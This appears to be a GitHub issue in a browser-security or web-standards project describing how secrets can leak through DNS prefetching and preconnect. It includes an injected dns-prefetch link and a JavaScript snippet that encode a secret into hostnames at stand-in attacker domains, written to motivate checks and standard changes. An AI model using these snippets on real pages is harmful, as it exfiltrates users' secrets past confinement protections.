Leaks via DNS prefetching

[deian]

+@nandersson:

Looked into prefetching and added some checks for that. Would be good to add something along these lines to the standard.

Can use link element with different relations to leak information - https://html.spec.whatwg.org/multipage/semantics.html#linkTypes.

E.g. by injecting <link rel="dns-prefetch" href="http://<secret>.evil.biz">.
Firefox seems to automatically resolve (DNS) for anchor tags injected into the page as well.
Could leak information via TCP preconnect or HTTP req through these elements. Not specified in terms of fetch as far as I'm aware of.

var anchor = document.createElement('a');                                                  
anchor.href = 'http://' + window.secret + '.attacker.com';                                                    
var text = document.createTextNode('Innocent link');                                 
anchor.appendChild(text);                                                  
document.body.appendChild(anchor);  

Relates to #33